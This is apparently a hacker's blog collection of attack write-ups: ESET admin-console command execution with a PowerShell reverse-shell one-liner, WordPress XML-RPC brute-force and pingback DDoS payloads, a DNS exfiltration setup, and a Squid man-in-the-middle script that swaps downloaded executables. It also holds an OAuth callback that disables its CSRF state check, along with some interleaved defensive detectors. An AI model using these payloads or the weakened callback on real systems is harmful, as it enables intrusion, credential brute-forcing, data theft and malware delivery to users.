This is how I hacked into your corporate network using your own antivirus agent

Recently I was busy with one of my client projects, which was a full penetration testing assignment against his company. After the external pentest I moved on to the internal pentest. The company itself has a Microsoft Windows environment with Active Directory configured, and they have been using ESET Endpoint as their antivirus. After a few hours I was able to break into one of the servers using the very popular exploit MS17-***.

After a few minutes I found clear-text passwords which they had saved in a web browser; I managed to decrypt all the passwords and moved on to lateral movement. Then I found that the ESET admin console password was among them 😀, so I logged into the admin console and saw that most of the computers were connected to the ESET endpoint.

Connected PCs

So I came up with this amazing idea: what if I could perform RCE against every connected device and get a shell from each of them? I did some research and found that ESET has a feature called Run Command Task[1]. According to the ESET documentation, the Run Command task can be used to execute specific command-line instructions on the client, and most importantly it executes the commands with NT AUTHORITY\SYSTEM privileges. After I found this I was able to get into the Active Directory servers, dump the hashes and compromise the entire network.

Then I reported this issue to the ESET security team and got this reply from the ESET Security Team: we do not consider this a vulnerability – it should allow clients to launch commands, done in the context of AGENT as LOCAL_SYSTEM. From a practical point of view it allows full administration of the machines assigned to the ERA/ESMC server. The task is simple – a BAT script is created with user-defined content and launched.
Security of the ERA/ESMC environment is based on access to the ERA/ESMC server. Once an attacker gets access to ERA/ESMC, he has access to the whole network.

According to the ESET security team it looks like they don't care about this issue very much, but I have to say the impact is huge. If an attacker is able to recover the password of the ERA server, it gives the attacker full privileges over the network. And finally, to the sysadmins: never store your passwords in plain text or in a web browser; always make sure to use a secure password store mechanism.

POC


  1. Go to https://server_ip/era/webconsole/#id=CLIENTS
  2. Right-click any connected device on which you want to perform the RCE
  3. Click New Task, fill in the basic info such as the task name, and select Run Command as the task. Then select the Settings tab, type the command you want to execute and click Finish
  4. Select your target again and click Run Task. Select your previously defined task, then select the Trigger tab and make sure the trigger type is set to As soon as possible. Then click Finish
  5. Game over!


PowerShell Reverse Shell Payload[2]

  1. powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('LISTENER-IP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  2. nc -lvp 443

Timeline:

Oct 10, 2018: Initial discovery

Jan 10, 2019: Report submitted to security@eset.com

Jan 14, 2019: Requested an update on the case

Jan 23, 2019: Requested an update on the case

Apr 11, 2019: Another report submitted to security@eset.com with POC and write-up

Apr 22, 2019: Requested an update on the case

May 5, 2019: Requested more information and details on the case

May 6, 2019: Found out it's a feature of ESET AV

Reply from ESET Security Team: (quoted in full above)

June 10, 2019: Released POC to public

June 11, 2019: Released blog post

Reference

[1] https://help.eset.com/esmc_admin/70/en-US/client_tasks_run_command.html

[2] https://gist.github.com/ohpe/bdd9d4385f8e6df26c02448f1bcc7a25

Exploiting WordPress XMLRPC

Recently I was playing with one of my client projects, which is a WordPress site. Then I saw an interesting path that Burp Suite caught, which looks something like this

https://site.com/xmlrpc.php

Then eventually I googled and did some research about WordPress XML-RPC, and it says

XML-RPC on WordPress is actually an API or "application program interface". It gives developers who make mobile apps, desktop apps and other services the ability to talk to your WordPress site. The XML-RPC API that WordPress provides gives developers a way to write applications (for you) that can do many of the things that you can do when logged into WordPress via the web interface

and it enables performing operations such as

  1. Publish a post
  2. Edit a post
  3. Delete a post.
  4. Upload a new file (e.g. an image for a post)
  5. Get a list of comments
  6. Edit comments

Exploiting XML-RPC

1. Brute force attacks

Looking at the API calls mentioned above, they require user authentication to perform a successful operation. In order to obtain user credentials we can perform a brute force attack against the user accounts. The important thing is that most security plugins hide the WordPress login page and add a captcha when a user fails to provide correct credentials more than 3 times, but through XML-RPC we can bypass all of these and perform the attack. Before we move on to that we should check whether XML-RPC is enabled on the target website; to check that we send the following GET request to the WordPress site

https://site.com/xmlrpc.php

In this example I'm using Burp Suite to intercept and send requests.

Check XML RPC Enable status

If XML-RPC is enabled, the server returns something like this: "XML-RPC server accepts POST requests only."

Now let's check which API functions we can actually access. To do that we send a POST request to xmlrpc.php with the following body:

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

As you can see, it returns a response with the list of available functions that we can access.

There are several functions we can use for brute force attacks, but we are going to focus on a few that are good and fast, such as

  1. system.multicall
  2. wp.UploadFile
  3. wp.getUsersBlogs

Let's try the wp.getUsersBlogs function

Request Type: POST
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>username</value></param>
<param><value>password</value></param>
</params>
</methodCall>

Brute force wordpress XMLRPC

As you can see, if the username and/or password is incorrect it returns the error message "Incorrect username or password".

Otherwise you get a nice response like the one depicted above. If the brute-forced user is an admin, it returns isAdmin with the numeric value 1.

The second function is system.multicall, which is a special one because we can try a high number of combinations in a single request (amplification brute force attack). For example, if we try out 20 username/password combinations with wp.getUsersBlogs, that sends 20 requests to the server, but with multicall we can do it in a single request. Let's see how.

<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin1</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>admin3</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

</data></array></value>
</param>
</params>
</methodCall>

In the above request we tried out 4 combinations in a single request.

Now let's try the wp.uploadFile function. This is my favorite method, because a lot of sites allow it by default and it always works.

Request Type: POST
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
	<methodName>wp.uploadFile</methodName>
	<params>
		<param><value><string>1</string></value></param>
		<param><value><string>test</string></value></param>
		<param><value><string>test</string></value></param>
		<param>
			<value>
				<struct>
					<member>
						<name>name</name>
						<value><string>file.jpg</string></value>
					</member>
					<member>
						<name>type</name>
						<value><string>mime/type</string></value>
					</member>
					<member>
						<name>bits</name>
						<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
					</member>
				</struct>
			</value>
		</param>
	</params>
</methodCall>

If the username and password are not correct it returns an incorrect password message like every other function; otherwise it returns a response like the one below. Note that this is a 500 fault about the upload directory, not the 403 "Incorrect username or password" fault, which tells you the credentials were accepted.

HTTP/1.1 200 OK
Date:  
Server: Apache/2.4.18 ( 
Connection: close
Vary: Accept-Encoding
Content-Length: 507
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>500</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string>Could not write file file.jpg (Unable to create directory wp-content/uploads/2018/01. Is its parent directory writable by the server?).</string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Now let's combine multicall and the wp.uploadFile function and try it out.

<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.uploadFile</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>1</string></value>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>

<value><struct>
<member>
<name>methodName</name>
<value><string>wp.uploadFile</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>1</string></value>
<value><string>admin2</string></value>
<value><string>test123</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>

Response

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><struct>
  <member><name>faultCode</name><value><int>500</int></value></member>
  <member><name>faultString</name><value><string>Could not write file  (Empty filename).</string></value></member>
</struct></value>
  <value><struct>
  <member><name>faultCode</name><value><int>403</int></value></member>
  <member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>

2. DDoS attacks

And yes, using XML-RPC we can simply pingback other servers with a simple POST request like this.

<methodCall>
    <methodName>pingback.ping</methodName>
    <params>
        <param><value><string>http://target/</string></value></param>
        <param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
    </params>
</methodCall>

When the pingback succeeds, the response looks like this
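
From the defender's side, the requests shown in this post are easy to tell apart from normal client traffic. The Python below is an added example, not part of this post or of WordPress itself: it parses a POST body sent to xmlrpc.php, lists every method it invokes (unwrapping system.multicall), counts the credentialed calls and flags pingback.ping, which is enough for a WAF rule or a plugin hook to reject the amplification and pingback patterns above. The method sets and the sample bodies are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Methods that take a username/password; a system.multicall stuffed with these is
# the amplification brute-force pattern shown in this post.
CREDENTIALED_METHODS = {"wp.getUsersBlogs", "wp.uploadFile", "wp.getUsers", "wp.getPosts"}
# Methods that make the server contact a third-party URL (pingback DDoS abuse).
OUTBOUND_METHODS = {"pingback.ping"}


def _struct_members(struct):
    """Map an XML-RPC <struct> to {member name: <value> element}."""
    return {m.findtext("name"): m.find("value") for m in struct.findall("member")}


def inner_method_names(body):
    """Return every method name an XML-RPC request invokes.

    A plain call yields a single name; system.multicall yields one name per
    nested call found under params/param/value/array/data.
    """
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    top = (root.findtext("methodName") or "").strip()
    if top != "system.multicall":
        return [top]
    names = []
    for struct in root.iterfind("params/param/value/array/data/value/struct"):
        name_el = _struct_members(struct).get("methodName")
        if name_el is not None:
            names.append("".join(name_el.itertext()).strip())
    return names


def inspect_request(body, max_credentialed_calls=1):
    """Classify one POST body to xmlrpc.php and say whether it should be rejected."""
    try:
        names = inner_method_names(body)
    except (ET.ParseError, ValueError) as exc:
        return {"methods": [], "credentialed_calls": 0, "flag": True,
                "reasons": ["unparseable request: %s" % exc]}
    credentialed = sum(1 for n in names if n in CREDENTIALED_METHODS)
    reasons = []
    if credentialed > max_credentialed_calls:
        reasons.append("multicall carries %d credentialed calls" % credentialed)
    for n in names:
        if n in OUTBOUND_METHODS:
            reasons.append("outbound method %s" % n)
            break
    return {"methods": names, "credentialed_calls": credentialed,
            "flag": bool(reasons), "reasons": reasons}


# --- constructed sample requests (not captured traffic) -----------------------
def _nested_call(method, *args):
    """One entry of a system.multicall array, in the layout used in this post."""
    values = "".join("<value><string>%s</string></value>" % a for a in args)
    return ("<value><struct>"
            "<member><name>methodName</name><value><string>%s</string></value></member>"
            "<member><name>params</name><value><array><data><value><array><data>%s"
            "</data></array></value></data></array></value></member>"
            "</struct></value>" % (method, values))


SAMPLE_SINGLE = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
                 "<param><value>username</value></param><param><value>password</value></param>"
                 "</params></methodCall>")

SAMPLE_MULTICALL = ("<methodCall><methodName>system.multicall</methodName><params>"
                    "<param><value><array><data>"
                    + _nested_call("wp.getUsersBlogs", "admin", "admin")
                    + _nested_call("wp.getUsersBlogs", "admin", "admin1")
                    + _nested_call("wp.uploadFile", "1", "admin", "password")
                    + "</data></array></value></param></params></methodCall>")

SAMPLE_PINGBACK = ("<methodCall><methodName>pingback.ping</methodName><params>"
                   "<param><value><string>http://target/</string></value></param>"
                   "<param><value><string>http://yoursite.com/post</string></value></param>"
                   "</params></methodCall>")

if __name__ == "__main__":
    for label, body in (("single", SAMPLE_SINGLE), ("multicall", SAMPLE_MULTICALL),
                        ("pingback", SAMPLE_PINGBACK)):
        print(label, inspect_request(body))
```

Run it directly to see the three samples classified. In a WordPress deployment the same decision belongs in the xmlrpc_methods filter (or xmlrpc_enabled to turn the endpoint off entirely) or in front of the site at the reverse proxy, where the multicall body can be inspected before PHP ever sees it.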

Mitigation

  1. https://community.rackspace.com/products/f/public-cloud-forum/6912/mitigating-xmlrpc-attacks-in-wordpress

Facebook Application Development Guide

Recently I was playing with the Facebook SDK and it was pretty impressive. It was also one of my university assignments, where we had to implement an app using OAuth. The application is simple: it grabs the user's profile picture and basic user info and embeds them into another image using the PHP GD Library [1]. So I decided to write a blog post about it and some best practices that you can use to build more secure apps. I'm using Arch Linux; all the commands are based on an Arch environment.

Use case

Introduction

OAuth is an open standard for authorization. It works over HTTP.

The key benefit to you is that you can allow access to your data on a site like Facebook without directly disclosing your username/password. OAuth facilitates the process by providing access while still protecting your data to some degree.

Prerequisite

  1. PHP/Apache
  2. composer
  3. PHP GD Library
  4. Facebook PHP SDK
  5. template image to manipulate
  6. Basic PHP Knowledge

Google is your friend 😉

Getting Started

First go to https://developers.facebook.com/ and add a new app.

Type your app name
In the dashboard go to Settings and in the App Domain field enter the domain name of your server. Since we are developing on localhost, I left it as localhost.

Go to the App Review tab and turn the Make MyApp public button to On. Also click the Start Submission button to request special permissions such as user_posts and publish_actions if you need to call the update-status APIs.
  1. Go to the root folder of your web server, open a terminal there and run the command below. After that you will see a folder called vendor.

composer require facebook/graph-sdk

  2. Create two files called login.php and callback.php. In login.php we authenticate the user with the Facebook servers; in callback.php we take the user's access token and grab the user details from the Facebook servers.
  3. Open login.php in your favorite text editor and paste the code below:

<?php
if (!session_id()) {
    session_start();
}
ini_set('display_errors', 1);
error_reporting(~0);
// Include the autoloader provided in the SDK
require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
$fb = new Facebook\Facebook([
    'app_id' => '{app-id}', // Replace {app-id} with your app id
    'app_secret' => '{app_secret}', // Replace {app_secret} with your app secret
    'default_graph_version' => 'v2.2',
]);
$helper = $fb->getRedirectLoginHelper();
$permissions = ['email']; // Optional permissions
$loginUrl = $helper->getLoginUrl('http://localhost/callback.php', $permissions);
echo '<a href="' . htmlspecialchars($loginUrl) . '">Log in with Facebook!</a>';
?>

Here $permissions = ['email']; // Optional permissions is where you define the permissions[2]. By default we can access the user's public info such as name, gender, picture etc., but if you need to post something to the user's feed you have to define it in the $permissions array, e.g. $permissions = ['email', 'user_posts'].

  4. In callback.php paste the code below:

<?php
if (!session_id()) {
    session_start();
}
ini_set('display_errors', 1);
error_reporting(~0);
require_once __DIR__ . '/vendor/facebook/graph-sdk/src/Facebook/autoload.php';
$fb = new Facebook\Facebook([
    'app_id' => '{app-id}', // Replace {app-id} with your app id
    'app_secret' => '{app_secret}', // Replace {app_secret} with your app secret
    'default_graph_version' => 'v2.2',
]);
$helper = $fb->getRedirectLoginHelper();
// This copies the state parameter from the URL into the session before the SDK compares
// the two, so the SDK's CSRF state check always passes; a production app should keep the
// state the SDK stored in the session at login time instead of overwriting it here.
$_SESSION['FBRLH_state'] = $_GET['state'];
try {
    $accessToken = $helper->getAccessToken();
} catch (Facebook\Exceptions\FacebookResponseException $e) {
    // When Graph returns an error
    echo 'Graph returned an error: ' . $e->getMessage();
    exit;
} catch (Facebook\Exceptions\FacebookSDKException $e) {
    // When validation fails or other local issues
    echo 'Facebook SDK returned an error: ' . $e->getMessage();
    exit;
}
if (!isset($accessToken)) {
    if ($helper->getError()) {
        header('HTTP/1.0 401 Unauthorized');
        echo "Error: " . $helper->getError() . "\n";
        echo "Error Code: " . $helper->getErrorCode() . "\n";
        echo "Error Reason: " . $helper->getErrorReason() . "\n";
        echo "Error Description: " . $helper->getErrorDescription() . "\n";
    } else {
        header('HTTP/1.0 400 Bad Request');
        echo 'Bad request';
    }
    exit;
}
$_SESSION['fb_access_token'] = (string) $accessToken;
try {
    // Returns a `Facebook\FacebookResponse` object
    $response = $fb->get('me?fields=picture.width(300),name', $accessToken->getValue());
} catch (Facebook\Exceptions\FacebookResponseException $e) {
    echo 'Graph returned an error: ' . $e->getMessage();
    exit;
} catch (Facebook\Exceptions\FacebookSDKException $e) {
    echo 'Facebook SDK returned an error: ' . $e->getMessage();
    exit;
}
$graphEdge = $response->getGraphNode();
$object = $response->getGraphObject();
$pic = $object->asArray('height');
$gen = uniqid();
// Save the profile picture next to the script under a random name
copy($pic['picture']['url'], '/srv/http/fbapp2/' . $gen . '.jpg');
$skills = array("", "Networking", "Reverse", "test");
$jpg_image = imagecreatefromjpeg('temp2.jpg'); // the template image
$mypro = imagecreatefromjpeg($gen . '.jpg');
// Allocate a color for the text
$white = imagecolorallocate($jpg_image, 255, 255, 255);
// Set path to font file
$font_path = '/srv/http/fbapp2/font.ttf';
// Print text on image
imagettftext($jpg_image, 22, 0, 230, 430, $white, $font_path, $object->getProperty('name')); // Facebook name
imagettftext($jpg_image, 22, 0, 235, 460, $white, $font_path, rand(1, 1000));
imagettftext($jpg_image, 18, 0, 240, 500, $white, $font_path, $skills[rand(1, 3)]);
// Output and free memory
ob_start();
// Copy and merge the profile picture onto the template
imagecopymerge($jpg_image, $mypro, 245, 75, 0, 0, 320, 320, 75);
imagejpeg($jpg_image);
$image_data = ob_get_contents();
ob_end_clean();
$image_data_base64 = base64_encode($image_data);
// Send image to browser
echo "<img src='data:image/jpeg;base64,$image_data_base64'>";
// Clear memory
imagedestroy($jpg_image);
imagedestroy($mypro);
?>
And here is the final result 😀

Making The App More Secure

To protect your apps from session hijacking attacks, Facebook provides a more secure way to pass sessions and tokens: enabling app secret proof[3].

To enable app secret proof

  1. In the column on the left click on Settings.
  2. Click on the Advanced tab
  3. Scroll down to the Security section.
  4. Find the toggle for App Secret Proof for Server API calls and click it to enable it.

$secure_var = hash_hmac('sha256', '{access-token}', '{app-secret}');

https://graph.facebook.com/v2.1/me?access_token=my-token
&appsecret_proof={value of $secure_var}
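
The hash_hmac line is the whole mechanism: the proof is an HMAC-SHA256 of the access token keyed with the app secret, so a token that leaks from a browser or a log cannot be replayed from a host that does not also hold the secret. The Python below is an added example, not the Facebook SDK's code, that computes the proof, appends it to a Graph URL and verifies it the way the receiving side would; the token and secret values are placeholders.

```python
import hmac
import hashlib
from urllib.parse import urlparse, urlunparse, parse_qsl, urlencode


def appsecret_proof(access_token, app_secret):
    """HMAC-SHA256 of the access token, keyed with the app secret, as lowercase hex.

    This is what hash_hmac('sha256', $token, $secret) in PHP produces.
    """
    return hmac.new(app_secret.encode("utf-8"), access_token.encode("utf-8"),
                    hashlib.sha256).hexdigest()


def sign_graph_url(url, access_token, app_secret):
    """Add access_token and appsecret_proof to a Graph API URL (server-side calls only;
    the secret must never be shipped to a browser or mobile client)."""
    parts = urlparse(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query["access_token"] = access_token
    query["appsecret_proof"] = appsecret_proof(access_token, app_secret)
    return urlunparse(parts._replace(query=urlencode(query)))


def proof_is_valid(access_token, app_secret, proof):
    """What the API side does: recompute the proof and compare in constant time.

    A stolen token without the app secret cannot produce a matching proof.
    """
    return hmac.compare_digest(appsecret_proof(access_token, app_secret), proof)


if __name__ == "__main__":
    # constructed placeholder values, not real credentials
    token, secret = "EAAB-constructed-token", "constructed-app-secret"
    signed = sign_graph_url("https://graph.facebook.com/v2.1/me?fields=name,picture", token, secret)
    print(signed)
    print(proof_is_valid(token, secret, appsecret_proof(token, secret)))        # True
    print(proof_is_valid(token, "wrong-secret", appsecret_proof(token, secret)))  # False
```

The proof is bound to one token, so rotating the token or the secret invalidates every proof computed before; a server that enforces "App Secret Proof for Server API calls" rejects any request that carries only the token.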

Project files Download


Reference

[1] https://secure.php.net/manual/en/intro.image.php

[2] https://developers.facebook.com/docs/facebook-login/permissions

[3] https://developers.facebook.com/docs/graph-api/securing-requests

Data Exfiltration Over DNS

What is it?

Bad guys use various methods to exfiltrate data from an organization or any other target; basically they need to exfiltrate data without being detected. Most organizations use firewalls and IDS to secure their network but still allow DNS (incoming/outgoing) 😀, so over DNS we can transfer files and other important stuff 😉. Here I wrote a simple C# script to demonstrate the attack. For educational purposes only.

How does it work?

The idea is simple: the script encodes your data, splits it into small parts and makes nslookup requests to a remote server with each part as a subdomain label; then you parse the logs on the remote server and decode the file.

Prerequisite

This is how my configuration files look

cat named.conf
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
logging {
    channel querylog {
        file "/var/log/qrlog";
        print-category yes;
        print-time yes;
    };
    category queries { querylog; };
};

cat db.steal.info
$TTL 86400
@ IN SOA steal.info. root.localhost. (
    1 ; Serial
    604800 ; Refresh
    86400 ; Retry
    2419200 ; Expire
    86400 ) ; Negative Cache TTL
;
@ IN NS localhost.
  IN A 10.0.0.1

cat named.conf.local
zone "steal.info" {
    type master;
    file "/etc/bind/db.steal.info";
};

Getting started

  1. Download and edit the DnsExfiltration script
    1. static String Domain = "YOUR-DOMAIN-NAME"; // add your bind domain
    2. static String NSserver = "YOUR-NAME-SERVER"; // add your DNS server IP address
    3. Call the ConvertInto64(string FileTosteal, string PathTosaveEncodedFile) function in the main method
    4. Call SendFile(string PathTosaveEncodedFile)
  2. On the Linux box open a terminal and run this command to reassemble the file
    1. egrep -o "[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME" /var/log/qrlog | cut -d . -f1 | uniq | awk '!a[$0]++' > /pathToSave/file.bin
    2. base64 -d file.bin > decoded.jpg
    3. Done!
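
The same query log that the egrep above reassembles the file from is what a defender watches. The Python below is an added example, not part of the DnsExfiltration script: it parses BIND query-log lines in the layout the named.conf above produces, groups them by zone and flags zones whose subdomain labels look like encoded chunks (long, drawn from the base64 alphabet, and never repeated). The log lines are constructed, and the thresholds are assumptions to tune per network.

```python
import re
from collections import defaultdict

# One BIND query-log line (print-time and print-category on, as in the named.conf above).
QUERY_RE = re.compile(
    r"client (?P<client>[0-9a-fA-F.:]+)#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)")
# A label that looks like a base64 chunk: long and drawn from the base64 alphabet.
B64_LABEL_RE = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")


def parse_query_log(text):
    """Yield (client, qname, qtype) for each query line; skip anything else."""
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("client"), m.group("qname").rstrip(".").lower(), m.group("qtype")


def zone_of(qname, depth=2):
    """Crude registrable-domain guess: the last `depth` labels (steal.info, example.com)."""
    return ".".join(qname.split(".")[-depth:])


def find_exfil_candidates(log_text, min_queries=10, min_avg_label=20.0, min_unique_ratio=0.9):
    """Zones whose subdomain traffic looks like encoded file chunks.

    Signals combined: many queries, almost every name unique (each chunk is new),
    long labels, and labels drawn from the base64 alphabet.
    """
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "clients": set(),
                                 "labels": 0, "label_chars": 0, "b64_labels": 0})
    for client, qname, _qtype in parse_query_log(log_text):
        zone = zone_of(qname)
        s = stats[zone]
        s["queries"] += 1
        s["names"].add(qname)
        s["clients"].add(client)
        prefix = qname[: -len(zone)].rstrip(".")
        for label in filter(None, prefix.split(".")):
            s["labels"] += 1
            s["label_chars"] += len(label)
            if B64_LABEL_RE.match(label):
                s["b64_labels"] += 1
    findings = []
    for zone, s in sorted(stats.items()):
        if s["queries"] < min_queries or s["labels"] == 0:
            continue
        avg_label = s["label_chars"] / s["labels"]
        unique_ratio = len(s["names"]) / s["queries"]
        b64_ratio = s["b64_labels"] / s["labels"]
        if avg_label >= min_avg_label and unique_ratio >= min_unique_ratio and b64_ratio >= 0.5:
            findings.append({"zone": zone, "queries": s["queries"], "clients": sorted(s["clients"]),
                             "avg_label_len": round(avg_label, 1),
                             "unique_ratio": round(unique_ratio, 2),
                             "b64_ratio": round(b64_ratio, 2)})
    return findings


def constructed_query_log():
    """Constructed log text in BIND's query-log layout; not a real capture."""
    fmt = ("10-Jun-2019 09:15:%02d.000 queries: info: client %s#%d (%s): "
           "query: %s IN A + (10.0.0.1)")
    lines = []
    # 12 chunk-looking names from one host, each label 40 base64 characters long
    for i in range(12):
        label = ("aGVsbG8gd29ybGQgdGhpcyBpcyBh" * 2)[:38] + "%02d" % i
        name = label + ".steal.info"
        lines.append(fmt % (i, "10.0.0.5", 40000 + i, name, name))
    # 6 ordinary lookups from other hosts
    for i, host in enumerate(["www", "mail", "www", "www", "imap", "www"]):
        name = host + ".example.com"
        lines.append(fmt % (20 + i, "10.0.0.%d" % (6 + i), 50000 + i, name, name))
    return "\n".join(lines)


if __name__ == "__main__":
    for finding in find_exfil_candidates(constructed_query_log()):
        print(finding)
```

The unique-name ratio is the strongest of the three signals: ordinary clients resolve the same handful of hosts over and over, while an exfiltration client never asks the same question twice because each query carries a fresh chunk. Bytes-per-client-per-zone over a sliding window is the natural next refinement.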

Demo Video

I tested this script with the following file types and it works 🙂

  • jpg 1Mb
  • mp3 3MB
  • exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664

Weaponizing the Squid proxy

Hey there, I recently played with the Squid proxy and got some cool ideas for doing evil things with Squid. I hope you all know about Squid; if not, the definition is attached below. After you read this post, think twice before using a public proxy 😀

What is squid

Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, from speeding up a web server by caching repeated requests; to caching web, DNS and other computer network lookups for a group of people sharing network resources, to aiding security by filtering traffic. Although primarily used for HTTP and FTP, Squid includes limited support for several other protocols including TLS, SSL, Internet Gopher and HTTPS. Squid does not support the SOCKS protocol.

Basically my idea is to perform a man-in-the-middle attack with the Squid proxy. There are lots of ways to perform MITM attacks, but this one is a little bit catchy and easy to set up. All we have to do is forward the victim's traffic into our proxy server. On a local network we can use ARP spoofing to do that; on a public network we can act as a "good" proxy server, which means we publish our proxy server to sites like proxynova[dot]com and wait until someone uses it.

There is more to man-in-the-middle attacks than just grabbing emails, passwords, cookies etc. I've written a basic Python URL-modification script that replaces all (non-HTTPS) Windows executable files (.exe) :3. In this example I'm using PuTTY as my "malicious" exe.

victim <><>bad squid<><>internet

Things we need

  • Squid
  • python
  • text editor
  • linux box
  • executable file to replace

Commands


sudo apt-get install squid # install squid
sudo gedit /etc/squid3/squid.conf # edit squid config file

# remember to add an ACL (in my case I added my home network)
# if you don't know what you're doing, just Google "squid proxy config"
acl home_network src 192.168.1.0/24
http_access allow home_network

# download squid_py.py from https://gist.github.com/Angelo99/934c6b0f6436659d836310a321279b68 and save it as /etc/squid/squid_py.py
# add these lines at the end of the config file and save it
redirect_program /usr/bin/python /etc/squid/squid_py.py
redirect_children 5

# now restart squid
sudo service squid3 restart

Downloads

Source Code

#!/usr/bin/env python

import sys

def modify_url(line):
    # squid hands us "URL client_ip/fqdn ident method ..." on one line
    parts = line.split(' ')
    old_url = parts[0]
    new_url = '\n'  # an empty answer tells squid to leave the URL unchanged
    if old_url.endswith('.exe'):
        # in this example I'm using PuTTY to replace all exe files at the proxy level
        new_url = 'http://the.earth.li/~sgtatham/putty/latest/w32/putty.exe' + new_url
    return new_url

while True:
    line = sys.stdin.readline()
    if not line:  # squid closed the pipe
        break
    new_url = modify_url(line.strip())
    sys.stdout.write(new_url)
    sys.stdout.flush()  # flush per request; a buffered answer would stall squid

Here are some tips: use your imagination and play with JS files ;)
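
The same redirector interface can be pointed the other way. Below is an added example (not the gist linked above) of a Squid redirect_program in Python 3 that, instead of swapping executables, answers a 302 to a notice page for any plain-HTTP download of a Windows executable, so the attack this post demonstrates cannot reach clients behind your own proxy. It speaks the same one-line-in, one-line-out protocol as the script above; the block page URL and the suffix list are assumptions.

```python
#!/usr/bin/env python3
"""Squid redirector that refuses unencrypted executable downloads.

Same line protocol as the script above: one request per stdin line
(URL client_ip/fqdn ident method ...), one answer per stdout line, where an
empty line means "leave the URL alone". A "302:URL" answer makes Squid send
the client a redirect instead of silently swapping the content.
"""
import sys
from urllib.parse import urlparse

BLOCK_PAGE = "http://proxy.internal/blocked-download.html"  # assumption: a page you host
RISKY_SUFFIXES = (".exe", ".msi", ".dll", ".scr", ".ps1", ".bat")  # assumption: tune to taste


def parse_redirector_line(line):
    """Split a Squid redirector request line into its named fields."""
    fields = line.split()
    if not fields:
        return None
    return {
        "url": fields[0],
        "client": fields[1] if len(fields) > 1 else "",
        "ident": fields[2] if len(fields) > 2 else "-",
        "method": fields[3] if len(fields) > 3 else "",
    }


def rewrite(line):
    """Return the redirector answer for one request line."""
    req = parse_redirector_line(line)
    if req is None:
        return ""
    url = urlparse(req["url"])
    if url.scheme == "http" and url.path.lower().endswith(RISKY_SUFFIXES):
        # a plain-HTTP binary can be swapped by anyone on the path; bounce to a notice page
        return "302:" + BLOCK_PAGE
    return ""  # unchanged: Squid fetches the original URL


def main():
    for line in sys.stdin:
        sys.stdout.write(rewrite(line.strip()) + "\n")
        sys.stdout.flush()  # Squid waits for this line; buffering would stall the proxy


if __name__ == "__main__":
    main()
```

Because the answer is a redirect rather than a silent substitution, the user sees why the download failed, and the proxy's access log records the 302 so the event is auditable. HTTPS downloads never pass through the redirector in a forward-proxy setup (they travel inside CONNECT tunnels), which is exactly why the script above only targets non-HTTPS executables.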

References

https://en.wikipedia.org/wiki/Squid_(software)
https://gofedora.com/how-to-write-custom-redirector-rewritor-plugin-squid-python/

happy hacking!!

ARP Spoofing with ArpyKitty

Hey guys, I just wrote an ARP spoof tool using Python and Scapy. It's really simple. I hope you all know about ARP spoofing, so I'm not going to write an ARP spoofing tutorial here.

Tested in Python 2.7.6

Run as: sudo python ArpyKitty.py

